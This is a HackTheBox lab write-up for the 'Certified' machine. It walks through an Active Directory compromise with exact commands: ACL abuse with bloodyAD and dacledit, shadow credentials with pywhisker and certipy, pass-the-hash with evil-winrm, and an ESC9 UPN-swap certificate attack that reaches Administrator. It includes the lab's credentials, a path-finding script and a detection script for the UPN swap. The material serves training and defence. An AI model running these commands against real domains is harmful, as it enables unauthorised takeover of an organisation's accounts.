Certified HTB Writeup | HacktheBox
Achieved a full compromise of the Certified machine, demonstrating the power of leveraging misconfigurations and services in AD environments. This walkthrough is now live on my website, where I detail the entire process step-by-step to help others understand and replicate similar scenarios during penetration testing. Check it out to learn practical techniques and sharpen your skills!
Initial Scenario
We begin the engagement with valid credentials for the user Judith Mader in the domain certified.htb. These were obtained from an earlier stage of the assessment:
Username: judith.mader
Password: judith09
User Account: judith.mader (low privilege domain user)
Target: Escalate from judith.mader to Administrator on the domain controller DC01 (the root flag).
Tools Utilized: nxc, BloodHound, bloodyAD, dacledit.py (Impacket), pywhisker, PKINITtools (gettgtpkinit.py, getnthash.py), certipy-ad and evil-winrm.
Enumeration
Nmap Scan
An initial Nmap scan revealed several open ports on the domain controller (DC01):
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-22 17:02:33Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP over SSL
3268/tcp open  ldap          Microsoft Global Catalog
3269/tcp open  ssl/ldap      Microsoft Global Catalog over SSL
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        .NET Message Framing
Key observations:
Active Directory Indicators: DNS (53), Kerberos (88/464), LDAP/LDAPS (389/636), Global Catalog (3268/3269), ADWS (9389) and SMB (445) together identify a Windows domain controller; WinRM (5985) is the remote-shell path used later.
SSL Certificates: The LDAPS certificate revealed the hostname DC01.certified.htb, and it was issued by an internal CA (certified-DC01-CA, the CA name used later with certipy), indicating that AD CS is installed on the domain controller.
SMB Signing: Nmap scripts indicated SMB signing is enabled and required (nxc confirms this below with signing:True), which rules out NTLM relay to this host's SMB service.
Testing SMB Login
With the obtained credentials, SMB authentication was tested using nxc:
nxc smb $IP -u 'judith.mader' -p 'judith09'
Output:
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
The credentials were successfully authenticated against the SMB service, confirming low-privilege access to the domain.
LDAP Enumeration with BloodHound
To map the domain structure and discover potential attack paths, LDAP enumeration was conducted using nxc with BloodHound collection enabled:
nxc ldap dc01.certified.htb -u judith.mader -p judith09 --bloodhound --collection All --dns-tcp --dns-server 10.10.11.41
Output:
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
LDAP 10.10.11.41 389 DC01 Resolved collection methods: objectprops, session, localadmin, dcom, trusts, rdp, container, psremote, acl, group
LDAP 10.10.11.41 389 DC01 Done in 00M 33S
LDAP 10.10.11.41 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.41_2024-11-22_054454_bloodhound.zip
The output was successfully collected and compressed into a ZIP file, ready for BloodHound analysis.
BloodHound Analysis
The BloodHound graph revealed a chain of ACL edges leading from the starting user towards the certificate operator account:
- Judith Mader's permissions:
  - judith.mader has WriteOwner on the Management group, so she can take ownership of the group, grant herself WriteMembers and add herself as a member.
- Management group:
  - The Management group has GenericWrite over the management_svc service account, which is enough to write its msDS-KeyCredentialLink attribute (shadow credentials).
- Service account (management_svc):
  - management_svc has GenericAll over the ca_operator user.
The final hop, from ca_operator to administrator, is not an ACL edge at all; it comes from certificate services, as shown in the root section.
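To show how such a chain is extracted from the raw collection rather than by clicking through the graph, the following script walks SharpHound-style JSON (the contents of the zip nxc produced) and BFS-searches for the shortest control path between two principals. This is an added example, not code from the original post or from BloodHound; the JSON below is constructed by hand in the shape of SharpHound's users.json/groups.json entries, reduced to the fields used, and the SIDs are placeholders.

```python
"""Find a privilege-escalation path over ACL edges in SharpHound-style JSON.
Added example, not the post's own code; the sample data is constructed and
reduced to the fields used (ObjectIdentifier, Properties.name, Aces, Members)."""
import json
from collections import deque

# Rights that give the holder control of the target object, or let it add
# itself to a target group, and therefore act as edges in the graph.
CONTROL_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
                  "Owns", "AddMember", "AddKeyCredentialLink", "ForceChangePassword"}

# Constructed sample mirroring the edges found on this box (placeholder SIDs).
SAMPLE_JSON = json.dumps({"data": [
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1103",
     "Properties": {"name": "JUDITH.MADER@CERTIFIED.HTB"}, "Aces": [], "Members": []},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1104",
     "Properties": {"name": "MANAGEMENT@CERTIFIED.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-1-1-1-1103", "RightName": "WriteOwner", "IsInherited": False}],
     "Members": []},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1105",
     "Properties": {"name": "MANAGEMENT_SVC@CERTIFIED.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-1-1-1-1104", "RightName": "GenericWrite", "IsInherited": False}],
     "Members": []},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1106",
     "Properties": {"name": "CA_OPERATOR@CERTIFIED.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-1-1-1-1105", "RightName": "GenericAll", "IsInherited": False}],
     "Members": []},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-500",
     "Properties": {"name": "ADMINISTRATOR@CERTIFIED.HTB"}, "Aces": [], "Members": []},
]})


def build_graph(raw):
    """Return (names, edges): names maps SID -> name, edges maps SID -> [(target_sid, right)]."""
    objs = json.loads(raw)["data"]
    names = {o["ObjectIdentifier"]: o["Properties"]["name"] for o in objs}
    edges = {sid: [] for sid in names}
    for o in objs:
        sid = o["ObjectIdentifier"]
        # An ACE on object o that grants principal P a control right is an edge P -> o.
        for ace in o.get("Aces", []):
            if ace["RightName"] in CONTROL_RIGHTS and ace["PrincipalSID"] in edges:
                edges[ace["PrincipalSID"]].append((sid, ace["RightName"]))
        # Group membership: a member inherits the group's outbound rights.
        for m in o.get("Members", []):
            if m["ObjectIdentifier"] in edges:
                edges[m["ObjectIdentifier"]].append((sid, "MemberOf"))
    return names, edges


def find_path(raw, start_name, goal_name):
    """Shortest control path as a list of (from, right, to) names; [] if none exists."""
    names, edges = build_graph(raw)
    by_name = {v.upper(): k for k, v in names.items()}
    start, goal = by_name[start_name.upper()], by_name[goal_name.upper()]
    prev = {start: None}
    queue = deque([start])
    while queue:
        cur = queue.popleft()
        if cur == goal:
            break
        for nxt, right in edges[cur]:
            if nxt not in prev:
                prev[nxt] = (cur, right)
                queue.append(nxt)
    if goal not in prev:
        return []
    path, node = [], goal
    while prev[node] is not None:
        src, right = prev[node]
        path.append((names[src], right, names[node]))
        node = src
    return path[::-1]


if __name__ == "__main__":
    for src, right, dst in find_path(SAMPLE_JSON, "judith.mader@certified.htb",
                                     "ca_operator@certified.htb"):
        print(f"{src} --{right}--> {dst}")
```

Against the sample data the search returns the three ACL hops above and finds no path to administrator, which is exactly the point: the last step has to come from the CA, not from the ACLs. On real output, load every `*_users.json`, `*_groups.json` and `*_computers.json` from the zip and concatenate their `data` arrays before calling `find_path`.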
User Privilege Escalation
1. Data Collection with nxc
- Action: The BloodHound data collected with nxc showed that judith.mader holds WriteOwner over the Management group, the first link in the chain.
- Details: Ownership of an object implies the right to rewrite its DACL, so WriteOwner is effectively full control of the group.
2. Setting Ownership
Used bloodyAD to set judith.mader as the owner of the “Management” group:
bloodyAD --host "$IP" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
3. Granting Write Permissions
As the new owner, granted judith.mader the WriteMembers right on the group's DACL with Impacket's dacledit.py:
python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
4. Adding to Management Group
Added judith.mader to the “Management” group:
bloodyAD --host $IP -d 'certified.htb' -u 'judith.mader' -p 'judith09' add groupMember "Management" "judith.mader"
5. Exploiting KeyCredentialLink
Now a member of Management (which has GenericWrite over management_svc), used pywhisker to add a KeyCredential to the msDS-KeyCredentialLink attribute of management_svc (shadow credentials); pywhisker writes a PFX to disk and prints its password:
python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add
6. Obtaining a TGT
Used PKINITtools' gettgtpkinit.py with that PFX to obtain a TGT for management_svc via PKINIT; the tool also prints the AS-REP encryption key, which is needed in the next step:
python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx /home/kali/HTB/Certified/pywhisker/pywhisker/loa78u6G.pfx -pfx-pass 2v752WSk3p8VJ1rYuYXT management_svc.ccache
7. Recovering NT Hash
Recovered the NT hash of management_svc with PKINITtools' getnthash.py, which requests a U2U service ticket with the TGT (KRB5CCNAME must point at the ccache written in the previous step) and decrypts the PAC credential information with the AS-REP key printed by gettgtpkinit.py (redacted below):
python3 getnthash.py certified.htb/management_svc -key XXXXXXX41f6e9b55f2ce52b9922f38bff7e293ac3989a0XXXXXXXXXXXX
8. Logging in with Evil-WinRM
Logged in over WinRM (port 5985) as management_svc with pass-the-hash:
evil-winrm -i $IP -u management_svc -H $NT_HASH   # NT hash of management_svc recovered in the previous step
Root Privilege Escalation
1. Identifying GenericAll Rights
BloodHound showed that management_svc has GenericAll over ca_operator, so the same shadow-credentials technique applies; the account name suggests it is the one tied to the certificate services on the DC.
2. Adding KeyCredential
Used certipy-ad's shadow auto, which adds a KeyCredential to ca_operator, authenticates with it via PKINIT, recovers the account's NT hash and then removes the KeyCredential again, all in one step:
certipy-ad shadow auto -u management_svc@certified.htb -hashes $NT_HASH -account ca_operator
3. Updating UPN of ca_operator
Updated the userPrincipalName of ca_operator to the bare value administrator. The bare name avoids the duplicate-UPN constraint (administrator@certified.htb already exists) and will later be matched against the built-in Administrator's sAMAccountName:
certipy-ad account update -u management_svc@certified.htb -hashes $NT_HASH -user ca_operator -upn administrator
4. Requesting Administrator Certificate
Requested a certificate as ca_operator (using the ca_operator hash from step 2) from the CertifiedAuthentication template. The UPN swap only yields a usable certificate because this template does not embed the SID security extension (Certipy's ESC9 pattern): the issued certificate carries ca_operator's current UPN, administrator, and nothing that ties it back to ca_operator's SID. Certipy names the output file after the UPN, administrator.pfx:
certipy-ad req -username ca_operator@certified.htb -hashes $CA_OPERATOR_HASH -ca certified-DC01-CA -template CertifiedAuthentication
5. Restoring Original UPN
Restored ca_operator's original UPN, so that the certificate's UPN no longer resolves to ca_operator and instead falls through to the Administrator account when the KDC maps it:
certipy-ad account update -u management_svc@certified.htb -hashes $NT_HASH -user ca_operator -upn ca_operator@certified.htb
6. Obtaining Administrator TGT
Authenticated with the certificate via PKINIT; certipy obtains a TGT for the account the certificate maps to, the built-in Administrator, and prints its NT hash:
certipy-ad auth -pfx administrator.pfx -domain certified.htb
7. Logging in as Administrator
Logged in with Evil-WinRM as administrator using the hash printed in the previous step:
evil-winrm -i $IP -u administrator -H $ADMIN_HASH
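The UPN swap above leaves a distinctive trace on the domain controller: a 4738 (user account changed) event whose new UPN names a different, existing account, followed within minutes by a 4887 (certificate issued) event for the changed account, and then a second 4738 restoring the UPN. The script below is an added detection example, not part of the original writeup or of any vendor rule set; the event records are constructed by hand and simplified to the fields the check uses (real 4738/4887 events carry many more fields, and the exact field names should be taken from your own log pipeline), and the account list is assumed.

```python
"""Detect the UPN-swap pattern (set account A's UPN to look like account B,
request a certificate as A, restore A's UPN) from DC security events.
Added example, not part of the post; events below are constructed and
reduced to the fields used, and KNOWN_ACCOUNTS is an assumed inventory."""
from datetime import datetime, timedelta

# Assumed inventory of sAMAccountNames, lower-cased (normally pulled from LDAP).
KNOWN_ACCOUNTS = {"administrator", "ca_operator", "management_svc", "judith.mader"}

# Constructed, simplified events. 4738 = user account changed, where
# UserPrincipalName holds the NEW value ("-" when the UPN was not touched);
# 4887 = Certificate Services issued a certificate to Requester.
SAMPLE_EVENTS = [
    {"EventID": 4738, "TimeCreated": "2024-11-22T17:10:01", "SubjectUserName": "management_svc",
     "TargetUserName": "ca_operator", "UserPrincipalName": "administrator"},
    {"EventID": 4887, "TimeCreated": "2024-11-22T17:10:45", "Requester": "CERTIFIED\\ca_operator",
     "CertificateTemplate": "CertifiedAuthentication"},
    {"EventID": 4738, "TimeCreated": "2024-11-22T17:11:10", "SubjectUserName": "management_svc",
     "TargetUserName": "ca_operator", "UserPrincipalName": "ca_operator@certified.htb"},
    # Benign: helpdesk corrects a UPN that still names its own account.
    {"EventID": 4738, "TimeCreated": "2024-11-22T18:00:00", "SubjectUserName": "helpdesk",
     "TargetUserName": "judith.mader", "UserPrincipalName": "judith.mader@certified.htb"},
]


def _ts(value):
    return datetime.fromisoformat(value)


def upn_owner(upn):
    """Account name a UPN would map to: the local part, lower-cased."""
    return upn.split("@")[0].lower()


def detect_upn_swaps(events, accounts=KNOWN_ACCOUNTS, window=timedelta(minutes=30)):
    """Return one finding per UPN change that makes an account look like another
    known account. Confidence is 'high' when the changed account obtained a
    certificate within `window` afterwards, otherwise 'medium'."""
    events = sorted(events, key=lambda e: _ts(e["TimeCreated"]))
    findings = []
    for i, e in enumerate(events):
        if e["EventID"] != 4738 or e["UserPrincipalName"] == "-":
            continue
        target = e["TargetUserName"].lower()
        new_owner = upn_owner(e["UserPrincipalName"])
        if new_owner == target or new_owner not in accounts:
            continue  # UPN still names its own account, or no known victim
        finding = {"changed_by": e["SubjectUserName"], "account": target,
                   "impersonates": new_owner, "at": e["TimeCreated"],
                   "confidence": "medium", "cert_template": None}
        t0 = _ts(e["TimeCreated"])
        # Look ahead for a certificate issued to the renamed account.
        for later in events[i + 1:]:
            if _ts(later["TimeCreated"]) - t0 > window:
                break
            if later["EventID"] == 4887 and \
                    later["Requester"].split("\\")[-1].lower() == target:
                finding["confidence"] = "high"
                finding["cert_template"] = later.get("CertificateTemplate")
                break
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in detect_upn_swaps(SAMPLE_EVENTS):
        print(f)
```

On the sample, only the 17:10 change is flagged, as high confidence with the template name attached; the restore and the helpdesk fix are ignored because their new UPN names the account itself. The same logic works for the sAMAccountName variant of the attack (ESC10 on DCs with weak certificate mapping) by checking the SamAccountName field of 4738 instead.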
Summary
- Key Steps:
  - Abused AD ACL misconfigurations (WriteOwner on a group, GenericWrite and GenericAll on accounts) with ownership/DACL changes and shadow credentials to move from judith.mader to management_svc and then ca_operator.
  - Exploited certificate services by swapping ca_operator's UPN and requesting a certificate from a template that omits the SID extension, yielding a certificate that authenticates as Administrator.
Result: Full compromise of the Certified machine.